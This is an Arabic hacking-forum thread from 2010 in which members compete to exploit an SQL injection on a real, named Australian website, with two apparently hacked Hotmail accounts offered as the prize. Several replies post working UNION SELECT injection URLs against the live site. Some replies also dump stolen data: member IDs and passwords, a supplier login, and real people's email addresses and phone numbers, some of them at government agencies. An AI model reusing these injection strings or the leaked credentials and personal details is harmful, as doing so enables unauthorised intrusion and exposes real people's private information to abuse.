:: vBspiders Professional Network :: - تحدي ! قم بإستخراج بيانات هذا الموقع و أحصل على ثلاثيين ...!

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- Hackers Showoff (http://www.vbspiders.com/vb/f91.html)

- - تحدي ! قم بإستخراج بيانات هذا الموقع و أحصل على ثلاثيين ...! (http://www.vbspiders.com/vb/t34126.html)

TIKTAKram

08-06-2010 10:34 PM

تحدي ! قم بإستخراج بيانات هذا الموقع و أحصل على ثلاثيين ...!

السلام عليكم و رحمة الله و بركاته

كيفكم أعزائي أعضاء الشبكة ؟ إن شاء الله تمام

اليوم أحببت أني أغير الروتين و أضع هدف و أنتو تحاولوا تستخرجوا بيانات المدير

تفضلوا الموقع :

كود:

www.ch2.net.au

و لأسهل عليكم الأمر أكثر الموقع مصاب بثغرة SQL

طبعا لن أضع الملف المصاب و المتغير

أبحثوا بأنفسكم و إستخرجوا البيانات

فقط أردت أن أنبه أن عند الحقن لازم شوي تعب لوول

طبعا أنا حقنت الموقع قبل ما أضع الموضوع يعني لما ما تقدروا راح أضع الحل

و أول من يستخرج الـ user و الـ password لصاحب الـ id رقم 1 هو الفائز

و الفائز راح يأخذ إيميلين مخترقين :

1- B41@hotmail.fr

2- و A46@hotmail.fr

بالتوفيق و في إنتظار الأعضاء

تقبلوا تحيتي

darkman.dz

08-06-2010 11:21 PM

ههههههههههههههههههههههههههه
جاري
فقط من أجل المتعة
وليس من أجل الإميلين

TIKTAKram

08-06-2010 11:51 PM

أوكي في إنتظارك و الإيميلين من حقك

بالتوفيق

darkman.dz

08-07-2010 01:13 AM

هناك عمودين و أنا قمت بالفلترة وما نفعت
فهل إستخدمت برنامج أم ماذا ؟؟

TIKTAKram

08-07-2010 01:20 AM

لا يا غالي لم أستعمل أي برنامج

كل شيء قمت به يدوي

ركز فقط كما قلت لكم في الموضوع لازم شوي تعب و ذكاء

Sil-Scor

08-07-2010 02:21 AM

[align=center]لعيونك...راح العب اللعبه[/align]

kanvi

08-07-2010 04:16 AM

شكرا أخي على المواقع

تم الحقن و لكن باستعمل برنامج coder للتشفير

اخي انت قلت انك حقنت الموقع يدوي كيف قمت بذللك

معلومات الموقع:

العمود المصاب رقم:1

اصدر قاعدة :5

وهده البسوردات التي استخرجتها:

كود PHP:

   2248879:TAA879,
1606240:DFT240,
186732:WDN732,
341000:DDC000,
27684:BAC684,
28265:GAC265,
201270: AWO270,
201272:CAP272,
201276:SHL276,
201278:PAC278,
27297:ANH297,
186889:DNH889,
299600:GPH600,
916300:value3,
27166:SAC166,
35511:ANH511,
2080243:CAP243,
28222:BGN222,
28257:MRN257,
186883:ANH883,
186885:CNH885,
186887:BPN887,
186900:SNH900,
417803:HBN803,
1606234:DLA234,
2058004:DIR1008,
37479:SAC479,
201269:CAP269,
201271:AAC271,
201273:CAC273,
201275:PAC275,
201277:SFR277,
206059:SAC059,
26761:NNH761,
173800:CNH239,
86888:CDN888,9
63919:FID919,
1050800:DIR1001,
1606235:DPA235,
201280:WAC280,
27861:ANC861,
186882:BNH882,
186884:SNH884,
186886:QHN886,
186901:WNC901,
398661:DIR1023,
417805:MNC805,
814200:GNH200,
186890:ERA890,
186892:DIR1018,
186894:DIR1021,
186896:DIR1022,
186898:SRA898,
417800:MIN800,
417804:RNC804,
949000:DIR1016,
1606232:DBA232,
1606243:DPA243,
1606239:DBG239,
1606241:DGP241,
186891:FNH891,
186893:DIR1019,
186895:DIR1036,
186897:DIR1025,
398653:DIR1020,
398670:DIR1017,
440100:NHM100,
941100:EPR100,
1606233:DGR233,
871400:ADS400,
713669:DSE669,
1606231:DSV231,

اني مبتداء ارجو اني قمت بعمل الصحيح

king dragons

08-07-2010 04:42 AM

هناك اكثر من عمود فيه يوزرات ولكن انا رايح اعطيك اليوزر والباس الي الــid تاعهم 1

username:sigma
password:sigma

kanvi

08-07-2010 04:49 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة kanvi (المشاركة 188976)

كود PHP:

   2248879:TAA879,
1606240:DFT240,
186732:WDN732,
341000:DDC000,
27684:BAC684,
28265:GAC265,
201270: AWO270,
201272:CAP272,
201276:SHL276,
201278:PAC278,
27297:ANH297,
186889:DNH889,
299600:GPH600,
916300:value3,
27166:SAC166,
35511:ANH511,
2080243:CAP243,
28222:BGN222,
28257:MRN257,
186883:ANH883,
186885:CNH885,
186887:BPN887,
186900:SNH900,
417803:HBN803,
1606234:DLA234,
2058004:DIR1008,
37479:SAC479,
201269:CAP269,
201271:AAC271,
201273:CAC273,
201275:PAC275,
201277:SFR277,
206059:SAC059,
26761:NNH761,
173800:CNH239,
86888:CDN888,9
63919:FID919,
1050800:DIR1001,
1606235:DPA235,
201280:WAC280,
27861:ANC861,
186882:BNH882,
186884:SNH884,
186886:QHN886,
186901:WNC901,
398661:DIR1023,
417805:MNC805,
814200:GNH200,
186890:ERA890,
186892:DIR1018,
186894:DIR1021,
186896:DIR1022,
186898:SRA898,
417800:MIN800,
417804:RNC804,
949000:DIR1016,
1606232:DBA232,
1606243:DPA243,
1606239:DBG239,
1606241:DGP241,
186891:FNH891,
186893:DIR1019,
186895:DIR1036,
186897:DIR1025,
398653:DIR1020,
398670:DIR1017,
440100:NHM100,
941100:EPR100,
1606233:DGR233,
871400:ADS400,
713669:DSE669,
1606231:DSV231,

اني مبتداء ارجو اني قمت بعمل الصحيح

اضن ان هذا بسورد admin

1:sigma,13:SN

darkman.dz

08-07-2010 02:08 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة kanvi (المشاركة 188976)

كود PHP:

   2248879:TAA879,

1606240:DFT240,

186732:WDN732,

341000:DDC000,

27684:BAC684,

28265:GAC265,

201270: AWO270,

201272:CAP272,

201276:SHL276,

201278:PAC278,

27297:ANH297,

186889:DNH889,

299600:GPH600,

916300:value3,

27166:SAC166,

35511:ANH511,

2080243:CAP243,

28222:BGN222,

28257:MRN257,

186883:ANH883,

186885:CNH885,

186887:BPN887,

186900:SNH900,

417803:HBN803,

1606234:DLA234,

2058004:DIR1008,

37479:SAC479,

201269:CAP269,

201271:AAC271,

201273:CAC273,

201275:PAC275,

201277:SFR277,

206059:SAC059,

26761:NNH761,

173800:CNH239,

86888:CDN888,9

63919:FID919,

1050800:DIR1001,

1606235:DPA235,

201280:WAC280,

27861:ANC861,

186882:BNH882,

186884:SNH884,

186886:QHN886,

186901:WNC901,

398661:DIR1023,

417805:MNC805,

814200:GNH200,

186890:ERA890,

186892:DIR1018,

186894:DIR1021,

186896:DIR1022,

186898:SRA898,

417800:MIN800,

417804:RNC804,

949000:DIR1016,

1606232:DBA232,

1606243:DPA243,

1606239:DBG239,

1606241:DGP241,

186891:FNH891,

186893:DIR1019,

186895:DIR1036,

186897:DIR1025,

398653:DIR1020,

398670:DIR1017,

440100:NHM100,

941100:EPR100,

1606233:DGR233,

871400:ADS400,

713669:DSE669,

1606231:DSV231,

اني مبتداء ارجو اني قمت بعمل الصحيح

أخي العزيز ال coder لا يعتبر برنامج حقن
يشفر ويفك التشفير و العمل يدوي +toolbar الهكر أيضا ليست برنامج
هنا قصدنا برنامج havij
يعني تستخرج منه كل شيئ وفقط تركب الإستغلال الأخير للحقنة يطلغ الناتج
هذا لا نحبذه هنا
في هذا القسم نستعمل برنامج havij فقط في المواقع اللي إصدار قاعدتها 4 (يعني اللي تخمين جداولها صعب ) + لتحديد مسار لوحة التحكم ....فقط أخي
أرجو أن تكون المعلومة قد وصلت

CODE3

08-07-2010 03:33 PM

جأأأأأري المحاولة

TIKTAKram

08-07-2010 03:42 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة kanvi (المشاركة 188976)

كود PHP:

   2248879:TAA879,

1606240:DFT240,

186732:WDN732,

341000:DDC000,

27684:BAC684,

28265:GAC265,

201270: AWO270,

201272:CAP272,

201276:SHL276,

201278:PAC278,

27297:ANH297,

186889:DNH889,

299600:GPH600,

916300:value3,

27166:SAC166,

35511:ANH511,

2080243:CAP243,

28222:BGN222,

28257:MRN257,

186883:ANH883,

186885:CNH885,

186887:BPN887,

186900:SNH900,

417803:HBN803,

1606234:DLA234,

2058004:DIR1008,

37479:SAC479,

201269:CAP269,

201271:AAC271,

201273:CAC273,

201275:PAC275,

201277:SFR277,

206059:SAC059,

26761:NNH761,

173800:CNH239,

86888:CDN888,9

63919:FID919,

1050800:DIR1001,

1606235:DPA235,

201280:WAC280,

27861:ANC861,

186882:BNH882,

186884:SNH884,

186886:QHN886,

186901:WNC901,

398661:DIR1023,

417805:MNC805,

814200:GNH200,

186890:ERA890,

186892:DIR1018,

186894:DIR1021,

186896:DIR1022,

186898:SRA898,

417800:MIN800,

417804:RNC804,

949000:DIR1016,

1606232:DBA232,

1606243:DPA243,

1606239:DBG239,

1606241:DGP241,

186891:FNH891,

186893:DIR1019,

186895:DIR1036,

186897:DIR1025,

398653:DIR1020,

398670:DIR1017,

440100:NHM100,

941100:EPR100,

1606233:DGR233,

871400:ADS400,

713669:DSE669,

1606231:DSV231,

اني مبتداء ارجو اني قمت بعمل الصحيح

أحسنت أخي و طبعا برنامج coder يعتبر تابع للحقن اليدوي

حقنتك صحيحة لكن ليست المطلةبة فكلهم أعضاء لا غير

نريد صاحب الـ ID = 1

بالتوفيق

TIKTAKram

08-07-2010 03:44 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة king dragons (المشاركة 188990)

هناك اكثر من عمود فيه يوزرات ولكن انا رايح اعطيك اليوزر والباس الي الــid تاعهم 1

username:sigma
password:sigma

شغلك صحيح 100%

فقط ضع الحقنة التي توصلك إلى هذه النتيجة و تكون أنت الفائز

من يضمن لي أنك لم تحقنه بالبرنامج من غير الحقنة الكاملة ؟؟ لوول

في الإنتظار و لو تعطي الحقنة تكون أنت الفائز أسرع قبل أن يأتي أحد قبلك :)

بالتوفيق

king dragons

08-07-2010 05:30 PM

تفضل يا غالي smilies17

http://direct.ch2.net.au/index.php?s...+from+supplier--

حط اخر الحقنة --

TIKTAKram

08-07-2010 05:59 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة king dragons (المشاركة 189315)

تفضل يا غالي smilies17

http://direct.ch2.net.au/index.php?s...+from+supplier--

حط اخر الحقنة --

أحسنت أخي الكريم

رائع و حقنة تقريبا نفسها التي في الحل المثالي

جاري إرسال جائزتك في الخاص ( إيميلين ثلاثيين )

1- UA1@hotmail.fr

2- و A46@hotmail.fr

بالتوفيق و نتمنى أن تكون من زوار الموضوع التالي :

http://www.vbspiders.com/vb/t33334.html

جاري الإرسال

darkman.dz

08-07-2010 06:50 PM

هاته الحفنة
اللي كتبها الأخ الكريم

كود:

http://direct.ch2.net.au/index.php?start=1&action=search&search=keywords&cat=-6759+union+select+1,2,3,4,5,concat%28supplierid,0x3a,username,0x3a,password%29,7,8,9,10,11,12,13,14+from+supplier

هل هو في السورس نتاع الصفحة أم ماذا ؟؟؟؟؟
لأني أكره البحث في السورس كثيرا

http://img440.imageshack.us/img440/2061/sanstitreol.jpg

darkman.dz

08-07-2010 06:59 PM

ههههههههههههههههههههههههههههه
الآن عرفت أين
بعد إعادة الحقن مرة أخرى

GuEvArA511

08-07-2010 07:06 PM

مشكور اخوي ماتقصر

لكن انا ماقدر اطلع العمود المصاب طلع لي كذا

access to this page was denied because the link you are using to access the page appears to be malicious.

If you feel this is an error please contact us.

darkman.dz

08-07-2010 07:25 PM

هاك أخي system-32
جبتلك كلشي
حتى أرقام الهاتف نتاع الجماعة و الإيميلات نتاعهم
هههههههههههههههههه
قلت بالاك تحب تخبرهم par telephone بلي السيت نتاعهم راهو عيان
+ أنا تنقلت بالسيكما
و بحثت في جدولين
وهاته هي الإجابة

كود:

members:member_password:ch2

supplier:password:ch2

members:member_password:ch2test

supplier:password:ch2test 

=======================================

*******************************

**members:member_password:ch2**

*******************************

members:member_id:ch2

members:member_name:ch2

members:username:ch2

members:member_email:ch2

members:member_password:ch2

members:member_date:ch2

members:member_address:ch2

members:member_address2:ch2

members:member_address3:ch2

members:member_address4:ch2

members:suburb:ch2

members:member_pcode:ch2

members:state:ch2

members:member_phone:ch2 

=================================

http://direct.ch2.net.au/index.php?start=1&action=search&search=keywords&cat=-6759 UNION SELECT 1,2,3,4,5,version(),7,8,9,10,11,

group_concat(member_id,0x3a,username,0x3a,member_password,0x3a,member_email,0x3a,member_phone),13,14+from+members--

group_concat(member_id,0x3a,username,0x3a,member_password,0x3a,member_email,0x3a,member_phone)
 

27297:27297:ANH297:APP-540@domainprincipal.com.au :08 9364 7722 

27684:27684:BAC684:annette.odea@ch2.net.au :08 9279 4258 

28265:28265:GAC265:annette.odea@ch2.net.au :08 9535 0700 

75510:75510:DKB510:joanne.leeds@ch2.net.au : 03 97813222 

75978:75978:coffee:Zorica.Dengate@dfat.gov.au :02 6261 2168 

75981:75981:coffee:Zorica.Dengate@dfat.gov.au : 02 62613317 

77035:77035:pla035:julie.glass@plahs.org.au :08 8683 0162 

77198:77198:pch198:phillip_rumballe@health.qld.gov.au :07 3350 8404 

77810:77810:mdf810:frackmd@bigpond.net.au : 02 93274199 

79965:79965:fwh965:K.Evans@fwmh.com.au :02 9827 6653 

80904:80904:dpk904:karenecoats@ozemail.com.au 

======================================================================

*************************

**supplier:password:ch2**

*************************

supplier:supplierid:ch2

supplier:suppliercode:ch2
 
 

supplier:name:ch2

supplier:username:ch2

supplier:password:ch2
 

supplier:supplierid:ch2test

supplier:suppliercode:ch2test
 

supplier:name:ch2test

supplier:username:ch2test

supplier:password:ch2test 

==================================================================

group_concat(name,0x3a,username,0x3a,password)
 

SIGMA PHARMACEUTICALS:sigma:sigma,

////name///////////*/user/*/pass/

وبالإنتقال بالسيكما نجد 

نفس الإجابة 

ههههههههههههههههههههههههههه

وهذا رابط الحقنة + السيكما 1 ز السيكما 2

- schema1 : 

http://direct.ch2.net.au/index.php?start=1&action=search&search=keywords&cat=-6759 UNION SELECT 1,2,3,4,5,group_concat(name,0x3a,username,0x3a,password),7,8,9,10,11,version(),13,14+from+ch2.supplier--

- schema 2:

http://direct.ch2.net.au/index.php?start=1&action=search&search=keywords&cat=-6759 UNION SELECT 1,2,3,4,5,group_concat(name,0x3a,username,0x3a,password),7,8,9,10,11,version(),13,14+from+ch2test.supplier--

TIKTAKram

08-07-2010 08:19 PM

إن شاء الله غدا أعمل لكم شرح فيديو عن حقن هذا الموقع لتستفادوا

بالتوفيق

darkman.dz

08-07-2010 08:22 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة Syst3m-32 (المشاركة 189412)

إن شاء الله غدا أعمل لكم شرح فيديو عن حقن هذا الموقع لتستفادوا

بالتوفيق

هل هذا يعني أن إجابتي خاطئة ؟؟؟؟

TIKTAKram

08-07-2010 08:32 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo (المشاركة 189415)

هل هذا يعني أن إجابتي خاطئة ؟؟؟؟

لا من قال ؟؟؟ لوول

إجابتك صحيحة و جميلة

لكن هناك من لم يفهم أصلا

لهذا راح أضع بإذن الله شرح فيديو غدا

لأن الآن أنا راح أضع شرح تنصيب Metasploit

بالتوفيق

darkman.dz

08-08-2010 01:34 AM

ok
^_^

king dragons

08-08-2010 01:15 PM

شكراً اخي Syst3m-32

TIKTAKram

08-08-2010 08:44 PM

أوكي إخواني

لكل من لم يفهم طريقة حقن هذا الموقع

أو حاول و لم يستطع

هذا هو الحل : شرح فيديو مدة 16 دقيقة :

http://www.vbspiders.com/vb/t34242.html

بالتوفيق

NeTCaT-Ma

08-08-2010 09:21 PM

مشكووور أخي على الشرح ان شاء الله الكل سيستفيد

darkman.dz

08-08-2010 11:39 PM

أرجو أن يستفيد الإخوة

KALASH3R

08-10-2010 01:46 AM

بارك الله فيك

Tnachh

09-21-2014 04:34 AM

رد: تحدي ! قم بإستخراج بيانات هذا الموقع و أحصل على ثلاثيين ...!

====// همسة فى أذن كل من يتثاقل عن المشاركة\\====
قال رسول الله "من َصنَع إليكم معروفا فكافئوه فإن لم تجدوا ما تكافئوا به فادعوا له حتى تروا أنكم قد كافأتموه"
وصح عن النبي أيضا "من ُصِنع إليه معروفا فقال لفاعله جزاك الله خيرا فقد أبلغ في الثناء"صحيح سنن ابى داود
فهل تعجز أخى عن كتابة " جزاك الله خيرا "لأخيك !؟ ولماذا تحرم نفسك أخى من هذا الخير !؟

واقول مبروووووووووووووك لك وعلا الاقل ينسخ معلومات الحقن في مخه هههههههه ماينساها

ولو تحطو تحديات ولاكن مو من الضروري هدايا فالعب معكم هديه كبيره

dark1995

09-28-2014 05:02 PM

رد: تحدي ! قم بإستخراج بيانات هذا الموقع و أحصل على ثلاثيين ...!

pfff what the hell

الساعة الآن 08:46 AM

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0